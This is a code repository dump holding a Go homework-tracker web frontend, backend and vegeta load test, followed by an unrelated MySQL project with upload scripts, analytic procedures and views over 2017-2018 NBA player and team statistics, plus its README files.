+ time.Now().UTC().String()) } time.Sleep(10 * time.Second) } } /* This function handles the request for the home page Input: an iris context Output: none */ func handleHome(ctx iris.Context) { response := sendToBackend(FrontendMessage{Operation: "home"}) if !response.Success { ctx.HTML("<h1>Error loading the home page: " + response.ErrMessage + "</h1>") } homeworks := response.Homeworks ctx.HTML("<h1>List of homeworks</h1>") ctx.HTML("<h1>Total number of homeworks: " + strconv.Itoa(len(homeworks)) + "</h1>") if len(homeworks) > 0 { ctx.HTML("<table>") ctx.HTML("<tr><th>Homework</th><th>Description</th><th>Submissions</th></tr>") for index, element := range homeworks { if !element.Deleted { ctx.HTML("<tr><td> <a href=\"/edit?id=" + strconv.Itoa(index) + "\">" + element.Homework.Name + "</a></td><td>" + element.Homework.Desc + "</td><td>" + strconv.Itoa(element.Homework.Submissions) + "</td></tr>") } } ctx.HTML("</table>") } else { ctx.HTML("Empty") } ctx.HTML("<a href=\"/create\">Create a new homework</a>") } /* This function handles the request for the edit page Input: an iris context Output: none */ func handleEdit(ctx iris.Context) { id, _ := strconv.Atoi(ctx.URLParam("id")) response := sendToBackend(FrontendMessage{Operation: "getOne", ID: id}) if !response.Success { ctx.HTML("<h1>Error getting the specified entry: " + response.ErrMessage + "</h1>") } homework := response.Homework ctx.HTML("<h1>Edit Homework</h1>") ctx.HTML("<form action=\"/edit_form\">") ctx.HTML("<input type=\"hidden\" name=\"id\" value=\"" + strconv.Itoa(id) + "\">Name:<br>") ctx.HTML("<input type=\"text\" name=\"itemName\" value=\"" + homework.Name + "\"><br>") ctx.HTML("Description:<br>") ctx.HTML("<input type=\"text\" name=\"desc\" value=\"" + homework.Desc + "\"><br>") ctx.HTML("<input type=\"submit\" value=\"Submit\"></form>") ctx.HTML("<a href=\"/delete\">Delete homework</a><br>") ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the edit_form page Input: an iris context Output: none */ func handleEditForm(ctx iris.Context) { id, _ := strconv.Atoi(ctx.FormValue("id")) name := ctx.FormValue("itemName") desc := ctx.FormValue("desc") response := sendToBackend(FrontendMessage{Operation: "edit", ID: id, NewHomework: Homework{Name: name, Desc: desc}}) if !response.Success { ctx.HTML("<h1>Error editing the specified entry: " + response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Updated!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the create page Input: an iris context Output: none */ func handleCreate(ctx iris.Context) { ctx.HTML("<h1>Edit Homework</h1>") ctx.HTML("<form action=\"/create_form\">Name:<br>") ctx.HTML("<input type=\"text\" name=\"itemName\"><br>") ctx.HTML("Description:<br><input type=\"text\" name=\"desc\"><br>") ctx.HTML("<input type=\"submit\" value=\"Submit\"></form>") ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the create_form page Input: an iris context Output: none */ func handleCreateForm(ctx iris.Context) { name := ctx.FormValue("itemName") desc := ctx.FormValue("desc") response := sendToBackend(FrontendMessage{Operation: "create", NewHomework: Homework{name, desc, 0}}) if !response.Success { ctx.HTML("<h1>Error creating a new entry: " + response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Created!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function handles the request for the delete page Input: an iris context Output: none */ func handleDelete(ctx iris.Context) { id, _ := strconv.Atoi(ctx.FormValue("id")) response := sendToBackend(FrontendMessage{Operation: "delete", ID: id}) if !response.Success { ctx.HTML("<h1>Error deleting the specified entry: " + response.ErrMessage + "</h1>") } else { ctx.HTML("<h1>Homework Deleted!</h1>") } ctx.HTML("<a href=\"/\">Back to home</a>") } /* This function sends a message to the backend server and returns the response Input: a FrontendMessage object Output: a BackendMessage object */ func sendToBackend(message FrontendMessage) BackendMessage { //Attempt to connect to the backend server conn, err := net.Dial("tcp", backend) if err != nil { return BackendMessage{Success: false, ErrMessage: err.Error()} } defer conn.Close() //Send the message to the backend server mes, _ := json.Marshal(message) conn.Write(mes) //Set up a timeout timeoutDuration := 5 * time.Second conn.SetReadDeadline(time.Now().Add(timeoutDuration)) //Receive and return the response buf := make([]byte, 1024*1024) //1MB buffer reqLen, bufErr := conn.Read(buf) if bufErr != nil { fmt.Println("Error reading:", bufErr.Error()) return BackendMessage{Success: false, ErrMessage: bufErr.Error()} } response := BackendMessage{} json.Unmarshal(buf[:reqLen], &response) //fmt.Println("Message received:" + string(buf)) return response } <file_sep>package main import ( "encoding/json" "flag" "fmt" "net" "os" "strconv" "sync" ) //Data structure for the data type Homework struct { Name string Desc string Submissions int } type FrontendMessage struct { Operation string ID int NewHomework Homework } type BackendMessage struct { Success bool Homeworks []HomeworkStore ErrMessage string Homework Homework } type HomeworkStore struct { Homework Homework Deleted bool } //Global variable for the data var homeworks = make([]HomeworkStore, 0, 5) var hwlocks = make([]sync.RWMutex, 0, 5) var counter = 0 var databaseLock sync.RWMutex /* The main loop of the program Input: none Output: none */ func main() { //Set flags portNumPtr := flag.Int("listen", 8090, "The port number the server will listen at") flag.Parse() //Parse any command-line arguments portNum := *portNumPtr //Initialize the data initializeData() //Run the server run(portNum) } /* This function initializes the data used for the server Input: none Output: none */ func initializeData() { addHomework(&Homework{"hw1", "Getting to know Go", 0}) addHomework(&Homework{"proj1", "Step 1 to the grand project", 0}) addHomework(&Homework{"hw2", "Getting to know Go again", 0}) addHomework(&Homework{"proj2", "Step 2 to the grand project", 0}) } /* This function runs the backend server Input: an int portnumber Output: none */ func run(port int) { //Attempt to set up the server ln, err := net.Listen("tcp", ":"+strconv.Itoa(port)) if err != nil { fmt.Println("Couldn't bind socket") os.Exit(1) } fmt.Println("Backend server running at port " + strconv.Itoa(port)) //The main loop of the backend server for { //Accept a connection conn, err := ln.Accept() go handleConnection(conn, err) } } /* This function handles the request for the home page Input: an iris context Output: none */ func handleConnection(conn net.Conn, err error) { if err != nil { fmt.Fprint(os.Stderr, "Failed to accept") os.Exit(1) } defer conn.Close() //fmt.Fprintln(os.Stderr, "Accepted connection from", conn.RemoteAddr()) //Read a message from the connection buf := make([]byte, 1024) reqLen, bufErr := conn.Read(buf) if bufErr != nil { fmt.Println("Error reading:", bufErr.Error()) } message := FrontendMessage{} json.Unmarshal(buf[:reqLen], &message) //fmt.Println("Message received:" + string(buf)) //Handle the message and respond response := handleMessage(message) res, _ := json.Marshal(response) conn.Write([]byte(res)) //fmt.Fprintln(os.Stderr, "connection ended") } /* This function processes an incoming message from the frontend server and respond accordingly Input: a FrontendMessage object Output: a BackendMessage object */ func handleMessage(message FrontendMessage) BackendMessage { switch message.Operation { case "home": return readAll() case "getOne": return readOne(message.ID) case "edit": return editHomework(message.ID, &message.NewHomework) case "create": return addHomework(&message.NewHomework) case "delete": return removeHomework(message.ID) case "ping": return BackendMessage{Success: true} default: return BackendMessage{Success: false, ErrMessage: "Unknown operation"} } } /* This function returns the entire list of homework Input: None Output: a BackendMessage object */ func readAll() BackendMessage { databaseLock.RLock() defer databaseLock.RUnlock() return BackendMessage{Success: true, Homeworks: homeworks} } /* This function returns the homework object specified by the integer Input: an integer Output: a BackendMessage object */ func readOne(id int) BackendMessage { databaseLock.RLock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].RLock() homework := homeworks[id] hwlocks[id].RUnlock() databaseLock.RUnlock() return BackendMessage{Success: true, Homework: homework.Homework} } /* This function creates an entry in the databse for the input Homework object Input: a pointer of Homework Output: a BackendMessage object */ func addHomework(hw *Homework) BackendMessage { hs := HomeworkStore{*hw, false} databaseLock.Lock() //Add the entry to the database homeworks = append(homeworks, hs) //Add a corresponding mutex to the mutex list var m sync.RWMutex hwlocks = append(hwlocks, m) databaseLock.Unlock() return BackendMessage{Success: true} } /* This function edits the entry in the database specified by the integer based on the input Homework object Input: a pointer of Homework and an integer Output: a BackendMessage object */ func editHomework(id int, hw *Homework) BackendMessage { //Even though this function writes to the database, it only acquires the database read lock, //because multiple edit operations need to be allowed as long as they are not editing the same entry, //but edit operations still need to block add operations, which might cause a resizing of the slice databaseLock.RLock() defer databaseLock.RUnlock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].Lock() defer hwlocks[id].Unlock() if !homeworks[id].Deleted { homeworks[id].Homework.Desc = hw.Desc homeworks[id].Homework.Name = hw.Name homeworks[id].Homework.Submissions++ return BackendMessage{Success: true} } else { return BackendMessage{Success: false, ErrMessage: "Specified entry is deleted. Cannot edit. "} } } /* This function marks the entry in the database specified by the integer as deleted Input: an integer Output: a BackendMessage object */ func removeHomework(id int) BackendMessage { databaseLock.RLock() defer databaseLock.RUnlock() if id >= len(homeworks) { return BackendMessage{Success: false, ErrMessage: "Index out of range"} } hwlocks[id].Lock() defer hwlocks[id].Unlock() if !homeworks[id].Deleted { homeworks[id].Deleted = true return BackendMessage{Success: true} } else { return BackendMessage{Success: false, ErrMessage: "Specified entry is already deleted. Cannot delete again. "} } } <file_sep># PaxosBase PaxosBase is a scalable distributed database system which supports CRUD operations and hosts a distributed database coordinated by Paxos protocol, allowing a large number of users to create, read, update and delete items in the database. PaxosBase features a frontend built by HTML and a backend built by Go ## How to build: `go run frontend.go --listen (custom port number) --backend (custom address of the backend server)` `go run backend.go --listen (custom port number)` `go run tests.go` <file_sep>package main import ( "bytes" "fmt" "strconv" "sync" "time" vegeta "github.com/tsenart/vegeta/lib" ) type Test struct { workers uint64 rate vegeta.Rate duration time.Duration target vegeta.Target wg *sync.WaitGroup } /* The main loop of the program Input: none Output: none */ func main() { //This class has 60 students and 3 instructors for i := 0; i < 10; i++ { fmt.Println("Round " + strconv.Itoa(i)) readTest() createTest() updateTest() updateCreateTest() } } /* This function implements a Read only test Input: none Output: none */ func readTest() { //Students come in and check out the homework fmt.Println("Test 1: A simple concurrent read test") runTest(Test{ workers: 60, rate: vegeta.Rate{Freq: 100, Per: time.Second}, duration: 4 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/", }, }) fmt.Println("-------------------------------------------------") } /* This function implements a Create only test Input: none Output: none */ func createTest() { //Instructors decide to give students more homework fmt.Println("Test 2: A simple concurrent create test") runTest(Test{ workers: 3, rate: vegeta.Rate{Freq: 100, Per: time.Second}, duration: 4 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/create_form?itemName=projN&desc=Step+N+of+the+project", }, }) fmt.Println("-------------------------------------------------") } /* This function implements an Update only test Input: none Output: none */ func updateTest() { //Students start to submit homework fmt.Println("Test 3: A simple concurrent update test") var wg sync.WaitGroup wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=0&itemName=hw1&desc=Getting+to+know+Go", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=1&itemName=proj1&desc=Step+1+to+the+grand+project", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=2&itemName=hw2&desc=Getting+to+know+Go+again", }, &wg, }) wg.Wait() fmt.Println("-------------------------------------------------") } /* This function implements a mixed Create-Update test Input: none Output: none */ func updateCreateTest() { //Students are submiting homework while intstructors are creating even more homework fmt.Println("Test 4: A simple concurrent update and create test") var wg sync.WaitGroup wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=0&itemName=hw1&desc=Getting+to+know+Go", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=1&itemName=proj1&desc=Step+1+to+the+grand+project", }, &wg, }) wg.Add(1) go runTest(Test{ 20, vegeta.Rate{Freq: 100, Per: time.Second}, 2 * time.Second, vegeta.Target{ Method: "GET", URL: "http://localhost:8080/edit_form?id=2&itemName=hw2&desc=Getting+to+know+Go+again", }, &wg, }) wg.Add(1) go runTest(Test{ workers: 3, rate: vegeta.Rate{Freq: 10, Per: time.Second}, duration: 2 * time.Second, target: vegeta.Target{ Method: "GET", URL: "http://localhost:8080/create_form?itemName=projN&desc=Step+N+of+the+project", }, wg: &wg, }) wg.Wait() fmt.Println("-------------------------------------------------") } /* This function runs a test based on the information given by the Test struct Input: a Test object Output: none */ func runTest(test Test) { if test.wg != nil { defer test.wg.Done() } targeter := vegeta.NewStaticTargeter(test.target) attacker := vegeta.NewAttacker(vegeta.Workers(test.workers)) var metrics vegeta.Metrics for res := range attacker.Attack(targeter, test.rate, test.duration, "") { metrics.Add(res) } metrics.Close() var buf bytes.Buffer vegeta.NewTextReporter(&metrics)(&buf) fmt.Println(buf.String()) }
8fde34ca1bbd181a169591d4627249ed64cbf2e6
[ "Markdown", "Go" ]
4
Go
zyyhhxx/PaxosBase
e10ea517e040f15a51b27756a52d0c4421ef2559
eb4973b24536fa12a3f406cdd7e6774f31800f9d
refs/heads/master
<repo_name>bannafingers55/Game-of-Life<file_sep>/readme.txt Hi, welcome to the Game of Life This is a simple version in Pygame. There are two different sizes of sprite, the 1 pixel version and the 40 pixel version. To change between them change the pygame.image.load statements to load the relevent sprite And then the tilesize to the size of the sprite.<file_sep>/gameOfLife.py import random import sys import pygame from pygame.locals import * import time pygame.init() fpsClock = pygame.time.Clock() TILESIZE = 1 width, height = 100, 100 screen = pygame.display.set_mode((width * TILESIZE, height * TILESIZE)) pygame.display.set_caption('Game of Life') #Constants DEAD = 0 ALIVE = 1 grid = [] #Textures textures = { DEAD: pygame.image.load("textures/dead2.png"), ALIVE: pygame.image.load("textures/alive1.png") } for i in range(1, width): app = [] for i in range(1, width): chance = random.randint(0, 100) if chance >= 10: square = DEAD else: square = ALIVE app.append(square) grid.append(app) def main(cells): for i in range(0, len(cells)-1): for n in range(0, width - 1): liveN = 0 try: if cells[i][n - 1] == ALIVE: liveN += 1 if cells[i][n+1] == ALIVE: liveN += 1 if cells[i-1][n] == ALIVE: liveN += 1 if cells[i-1][n + 1] == ALIVE: liveN += 1 if cells[i-1][n-1] == ALIVE: liveN += 1 if cells[i + 1][n] == ALIVE: liveN += 1 if cells[i + 1][n+1] == ALIVE: liveN += 1 if cells[i + 1][n -1] == ALIVE: liveN += 1 except: continue #Death by Isolation if liveN <= 1: cells[i][n] = DEAD #Death by Overcrowding if liveN >= 4: cells[i][n] = DEAD #Birth Rule if liveN == 3: cells[i][n] = ALIVE screen.fill((0, 0, 0)) for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() # Update. # Draw. for i in range(0, len(cells)): for n in range(0, width - 1): screen.blit(textures[cells[i][n]], (i * TILESIZE, n * TILESIZE)) pygame.display.flip() time.sleep(0.1) while True: main(grid)
c56bd7efe07f40b15e512e90dbc3a7130aac502d
[ "Python", "Text" ]
2
Text
bannafingers55/Game-of-Life
7a59b1e97bb89058397436e21c63d51ea5696bf9
a7bf15b1e5881ba39fab841a3a0157bb59c270f6
refs/heads/master
<file_sep>import React, { Component } from 'react'; import logo from './logo.svg'; import foods from './foods.json' import FoodBox from './FoodBox'; import AddFood from './AddFood'; import './App.css' import 'bulma/css/bulma.css'; class App extends Component { constructor(props) { super(props) this.state = { allFoods: foods, visible: false, } } toggleFoods = () => { this.setState({ visible: !this.state.visible }); } showFoods() { console.log(this.state) return this.state.allFoods.map((food, index) => { console.log(foods) return <FoodBox key={index} {...food} /> }) } addFoodHandler = (theFood) => { const foodsCopy = [...this.state.allFoods]; foodsCopy.push(theFood); this.setState({ allFoods: foodsCopy, }) } render() { return ( <div className="App"> <header className="App-header"> <h1 className="App-title">IronNutrition</h1> </header> <button onClick={() => this.toggleFoods()}>AddFood </button> {this.state.visible ? <AddFood addTheFood={this.addFoodHandler.bind(this)}/> : null} <div className="foods-list"> {this.showFoods()} </div> </div> ); } } export default App;
fa8bf86fe73ab02d14990786344bd0c29ffee765
[ "JavaScript" ]
1
JavaScript
marcellemcm/lab-react-ironnutrition
cd15d1d3388635a5ae8979b874c3ec23a29fc31c
9c1125c7c6e55d4a9232f82c12ce7bedb4f9c9e0
refs/heads/main
<file_sep>## Images for DE1 Term Project These images outline the outcome of the created views for the analytical layers <file_sep># Term_DE1 ## NBA Statistics (2017-2018) ### Project Aim The aim of this project is to link concepts learned during the DE1SQL course by exercising SQL statements covered. ### Contents #### Detailed Description Describes the project and its components in further detail. Includes the description of analytical layers and the list of analytical questions and the data marts (views) that were created as an answer. #### Data The directory contains the data used for the project in csv format. It includes the following six tables: * Coaches * Player_Stats * Players * Team_Stats * Teams In addition, a description of the data is provided in the folder. #### Codes Contains all the codes that are used to upload the data to MySQL and obtain the answers to the analytical questions. The specific codes are listed below. #### Upload Code (upload_code_nba) The code used to upload the data to MySQL Workbench. #### Player Analytics (individual_player_analytic.sql) The individual_player_analytic.sql holds the code for the player-level analytic layer. It also includes the code for all of the establised views. #### Team Analytics (team_coach_analytic.sql) Includes the code for analytic layer focused on team and coach statistics as well as the susequent views. #### Images Contatins the all the images including the outline of the relational schema and the views created. All images are used in the term_DE1_description.md file. <file_sep>## Data The directory contains the data used for the project in csv format. It includes the following six tables: * Coaches * Player_Stats * Players * Team_Stats * Teams The aforementioned tables servea as a base for the Operational Layer described below. ### Operational Layer The layer data includes of National Basketball Association (NBA) statistics for players, teams and coaches for 2017-2018 season. CSV files were used to to store the raw date. Then a schema and tables was created with the same attributes as the CSV files. Finally, the data was inserted into MySQL using the following command LOAD DATA LOCAL INFILE 'path_to_csv_file' INTO TABLE 'corresponding_table' FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES <file_sep>DROP SCHEMA IF EXISTS nba_17_18; -- creating schema CREATE SCHEMA nba_17_18; USE nba_17_18; -- Creating Tables -- Coahes CREATE TABLE Coaches ( Name VARCHAR(100), TeamID INT REFERENCES Teams(TeamID), PRIMARY KEY(Name, TeamID)); -- Player Stats CREATE TABLE Player_Stats ( Player VARCHAR(100) NOT NULL, Tm VARCHAR(10) NOT NULL, Gms INT, Gstart INT, MP INT, FG INT, FGA INT, FGP FLOAT, ThreeP INT, ThreePA INT, ThreePP FLOAT, TwoP INT, TwoPA FLOAT, TwoPP FLOAT, eFGP FLOAT, FT INT, FTA FLOAT, FTP FLOAT, ORB INT, DRB INT, TRB INT, AST INT, STL INT, BLK INT, TOV INT, PF INT, PTS INT, PRIMARY KEY(Player, Tm)); -- Players CREATE TABLE Players ( Name VARCHAR(100), Pos VARCHAR(10), Age INT, PRIMARY KEY(Name)); -- Team Stats CREATE TABLE Team_Stats ( TeamId INT, G INT, MP INT, FG INT, FGA INT, FGP FLOAT, ThreeP INT, ThreePA INT, ThreePP FLOAT, TwoP INT, TwoPA INT, TwoPP FLOAT, FT INT, FTA INT, FTP FLOAT, ORB INT, DRB INT, TRB INT, AST INT, STL INT, BLK INT, TOV INT, PF INT, PTS INT, PRIMARY KEY(TeamId)); -- Teams CREATE TABLE Teams ( TeamID INT NOT NULL, TeamName VARCHAR(100) NOT NULL, TeamAbbr VARCHAR(10), Location VARCHAR(100), PRIMARY KEY(TeamID)); -- local_infile to be ON SHOW VARIABLES LIKE "local_infile"; SET GLOBAL local_infile = 'ON'; -- Loading Data -- Load Coaches LOAD DATA LOCAL INFILE '/Data/Coaches.csv' INTO TABLE Coaches FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Name, TeamID); -- Load Player Stats LOAD DATA LOCAL INFILE '/Data/Player_Stats.csv' INTO TABLE Player_Stats FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Player, Tm, Gms, Gstart, MP, FG, FGA, FGP, ThreeP, ThreePA, ThreePP, TwoP, TwoPA, TwoPP, eFGP, FT, FTA, FTP, ORB, DRB, TRB, AST, STL, BLK, TOV, PF, PTS); -- Load Players LOAD DATA LOCAL INFILE '/Data/Players.csv' INTO TABLE Players FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Name, Pos, Age); -- Load Team Stats LOAD DATA LOCAL INFILE '/Data/Team_Stats.csv' INTO TABLE Team_Stats FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (TeamID, G, MP, FG, FGA, FGP, ThreeP, ThreePA, ThreePP, TwoP, TwoPA, TwoPP, FT, FTA, FTP, ORB, DRB, TRB, AST, STL, BLK, TOV, PF, PTS); -- Load Teams LOAD DATA LOCAL INFILE '/Data/Teams.csv' INTO TABLE Teams FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (TeamID, TeamName, TeamAbbr, Location); <file_sep>use nba_17_18; -- Creating analytical layer for player statistics DROP PROCEDURE IF EXISTS CreatePlayersAnalytic; DELIMITER // CREATE PROCEDURE CreatePlayersAnalytic() BEGIN DROP TABLE IF EXISTS Players_Analytic; CREATE TABLE Players_Analytic AS SELECT Players.Name, Players.Pos As Position, Players.Age As Age, Player_Stats.TM As Franchise, Player_Stats.Gms As Games, Player_Stats.MP As MinutesPlayed, Player_Stats.FG As FieldGoals, Player_Stats.FGA As FieldGoalsAttempt, Player_Stats.FGP As FieldGoalsPercent, Player_Stats.PTS As Points FROM Players JOIN Player_Stats ON name = Player ORDER BY Name; END // DELIMITER ; drop event if exists CreatePlayersAnalyticEvent; -- Creating an event for Players analytics tables to see when table is updated CREATE EVENT CreatePlayersAnalyticEvent ON SCHEDULE EVERY 1 MINUTE STARTS CURRENT_TIMESTAMP ENDS CURRENT_TIMESTAMP + INTERVAL 1 HOUR DO CALL CreatePlayersAnalytic(); INSERT INTO messages(message,created_at) VALUES('Player Mart Created',NOW()); SELECT * FROM messages; -- Creating data marts as views to answer the analytic questions -- Players that averaged 25 or more points per game and how many games they played DROP VIEW IF EXISTS TopPPG; CREATE VIEW `TopPPG` AS SELECT Name, Position, Age, Games, ROUND(Points/Games, 2) AS ppg FROM Players_Analytic WHERE Points/Games >= 25; SELECT * FROM TopPPG; -- Top 10 most time efficient scorers in the league DROP VIEW IF EXISTS TopTimeEfficient; CREATE VIEW `TopTimeEfficient` AS SELECT Name, Position, Points, MinutesPlayed, ROUND (pointsPer48, 2) AS PointsPer48 FROM ( SELECT Name, Position, Points, MinutesPlayed, CAST(Points as FLOAT)*48/CAST(MinutesPlayed as FLOAT) as PointsPer48 FROM Players_Analytic WHERE Points > 0 AND MinutesPlayed > 0) as ps ORDER BY PointsPer48 DESC LIMIT 10; SELECT * FROM TopTimeEfficient; -- Players who played half the season or less but still averaged 15 points DROP VIEW IF EXISTS HalfSeason15Points; CREATE VIEW `HalfSeason15Points` AS SELECT Name, Position, Games, Points, ROUND (CAST(Points as FLOAT)/CAST(Games as FLOAT),2) as PPG FROM Players_Analytic WHERE Games <= 41 AND CAST(Points as FLOAT)/CAST(Games as FLOAT) > 15 AND Points > 0 ORDER BY CAST(Points as FLOAT)/CAST(Games as FLOAT) DESC; SELECT * FROM HalfSeason15Points; <file_sep>-- Creating a datamart for teams, coaches, team statistics use nba_17_18; DROP PROCEDURE IF EXISTS CreateTeamCoachAnalytic; DELIMITER // CREATE PROCEDURE CreateTeamCoachAnalytic() BEGIN Drop table if exists Team_Coach_Analytic; CREATE TABLE Team_Coach_Analytic AS SELECT Teams.TeamID, Coaches.name AS Coach, Teams.TeamName As Franchise, Teams.TeamAbbr As Short_Franchise, Teams.Location As City, Team_Stats.G As Games, Team_Stats.FG As FieldGoals, Team_Stats.FGA As FieldGoalsAttempt, Team_Stats.FGP As FieldGoalsPercent, Team_Stats.ThreeP As Team_3P, Team_Stats.ThreePA As Team_3PA, Team_Stats.ThreePP As Team_3PP, Team_Stats.AST As Assist, Team_Stats.STL As Steal, Team_Stats.BLK As BlockShot, Team_Stats.TOV As Turnover, Team_Stats.PF As Fouls, Team_Stats.PTS As Points FROM Teams JOIN Team_Stats ON Teams.teamid = team_stats.teamid JOIN Coaches ON Teams.teamid = coaches.teamid ORDER BY TeamID ; END // DELIMITER ; -- Creating messages table to caprture event DROP TABLE IF EXISTS MESSAGES; CREATE TABLE messages ( id INT PRIMARY KEY AUTO_INCREMENT, message VARCHAR(255) NOT NULL, created_at DATETIME NOT NULL ); -- Creating an event for Team Stat Coach Data Analytic DROP EVENT IF EXISTS CreateTeamCoachAnalyticEvent; CREATE EVENT CreateTeamCoachAnalyticEvent ON SCHEDULE EVERY 1 MINUTE STARTS CURRENT_TIMESTAMP ENDS CURRENT_TIMESTAMP + INTERVAL 1 HOUR DO CALL CreateTeamCoachAnalytic(); INSERT INTO messages(message,created_at) VALUES('Team Stats Coach Mart Created',NOW()); -- Checking the messages table SELECT * FROM messages; -- Potential Analytics that can be done with Team and Coach data using views -- Top 10 Coaches by defence. Showstop 10 defensive coaches including aggreagated and per game stats for steals, rebounds and Blocked shots. Ordered by steals, assuming steals are the ultimate goal of a tema on defence DROP VIEW IF EXISTS CoachesByDefence; CREATE VIEW `CoachesByDefence` AS SELECT Coach, Franchise, Steal, ROUND(Steal/games, 2) AS StealperGm , BlockShot, ROUND(BlockShot/games, 2) AS BlockShotPerGm, Fouls, ROUND(fouls/games, 2) AS FoulsPerGm FROM Team_Coach_Analytic ORDER BY Steal DESC LIMIT 10; SELECT * FROM CoachesByDefence; -- Shooting patterns of different teams depending on coach in terms of 3 point shootin and its effects the Filed Goal and Effective Field Goal percentages DROP VIEW IF EXISTS CoachesBy3PShooting; CREATE VIEW `CoachesBy3PShooting` AS SELECT Coach, Franchise, Team_3PA, Team_3P, ROUND (Team_3PP, 2) AS Team_3PP, ROUND(FieldGoalsPercent, 2) AS FieldGoal, ROUND((FieldGoals + (0.5 * team_3P))/FieldGoalsAttempt, 2)as eFieldGoal FROM Team_Coach_Analytic ORDER BY Team_3P DESC; SELECT * FROM CoachesBy3PShooting; -- Coaches who move the ball the most (assist on field goal ratio is over 0.5) and how it affects the turnovers DROP VIEW IF EXISTS CoachesByPassing; CREATE VIEW `CoachesByPassing` AS SELECT Franchise, Assist, ROUND(CAST(Assist as FLOAT)/CAST(FieldGoals as FLOAT), 2) as AssistOnFieldGoalRatio, Turnover FROM Team_Coach_Analytic WHERE CAST(assist as FLOAT)/CAST(fieldgoals as FLOAT) > .5; SELECT * FROM CoachesByPassing; <file_sep>## Codes Contains all the codes that are used to upload the data to MySQL and obtain the answers to the analytical questions. The specific codes are listed below. #### Upload Code (upload_code_nba) The code used to upload the data to MySQL Workbench. #### Player Analytics (individual_player_analytic.sql) The individual_player_analytic.sql holds the code for the player-level analytic layer. It also includes the code for all of the establised views. #### Team Analytics (team_coach_analytic.sql) Includes the code for analytic layer focused on team and coach statistics as well as the susequent views. <file_sep># Term_DE1 ## Project Description ### OPERATIONAL LAYER: The data includes National Basketball Association (NBA) statistics for players, teams and coaches for 2017-2018 season. The relational database can be seen below. ![Figure 1 - Relational Database NBA](Images/RelationSchema1.png) CSV files were used to store the raw data. Then a schema and tables were created with the same attributes as the CSV files. Finally, the data was inserted into MySQL using the following command * LOAD DATA * LOCAL INFILE 'path_to_csv_file' * INTO TABLE 'corresponding_table' * FIELDS TERMINATED BY ',' * LINES TERMINATED BY '\r\n' * IGNORE 1 LINES ### ANALYTICAL LAYER: After the tables were loaded to MySQL, the analytical data layer was established. Due to the fact that not all of the tables in the operationla layer can be related to each other, the decision to create two analytical tables was made. The tables are created using events which re-create them every minute for an hour and record the times of creation to a table called “messages”. Below is amore deatailed description for each of the created tables. 1. Team_Coach_Analytic: includes information about teams such as the Franchise name, name abbreviation, city/state and the coach. In addition, it includes both defensive and offensive statistics. This can provide insight to team performance for he season, using both the already available data and trnformed data (e.g. assist on field goal percentage). 1. Players_Analytic: includes the players’ attributes such as name, age, position and franchise as well as individual performance metrics like games played. Data from this layer provides the opportunity to create more detailed analytic insight to see what player were major contributors to team performance. By creating views from the above data marts, we can potentially answer the following question. ### ETL The process of ETL included the extraction of chosen metrics from the Aanlytical Layer, transformation by using arithmetic operations (where applicable), combibing the outcomes with readily available data and loading back to views which provide answers to the questions listed below. ### POTENTIAL ANALYTICS: #### Team Level (Team_Coach_Analytic) * Question 1: Who are the top 10 defensive coaches including aggreagated and per game stats for steals, rebounds and Blocked shots. The view is ordered by steals, assuming steals are the ultimate goal of a tema on defence. * Question 2: What are the shooting patterns in terms of 3 point shooting and how it effects the Filed Goal and Effective Field Goal percentages? * Question 3: Which Coaches move the ball the most (assist on field goal ratio is over 0.5) and how it affects the turnovers? #### Player Level (Players_Analytic) * Question 1: Which players averaged over 25 points per game and how amny games they played? * Question 2: Who was the most time (48 minutes) efficient scorer in the league? * Question 3: What players played less than or equal to half the season but scored over 15 points a game? ### DATA MART: The following queries result in views that provide answers to the questions listed above. #### Team Level * Question 1: SELECT * FROM CoachesByDefence; ![Figure 2 - Top 10 Defensive Coaches](Images/CoachPerDefence.png) * Question 2: SELECT * FROM CoachesBy3PShooting; ![Figure 3 - Top 10 Coaches by Shooting Patterns](Images/CoachesBy3PShooting.png) * Question 3: SELECT * FROM CoachesByAssist; ![Figure 4 - Coaches by Passing](Images/CoachesByPassing.png) #### Individual Level * Question 1: SELECT * FROM TopPPG; ![Figure 8 - Top Scorers per Game](Images/TopScorers.png) * Question 2: SELECT * FROM TopTimeEfficient; ![Figure 9 - Top 10 Most Time Efficient Players](Images/PointsPer48.png) * Question 3: SELECT * FROM HalfSeason15Points; ![Figure 10 - PLayers that Played Half Season or Less but Avearged at least 15 PPG ](Images/HalfSeason15Points.png)
605e5b9afd106017131880e055192b23c11928f5
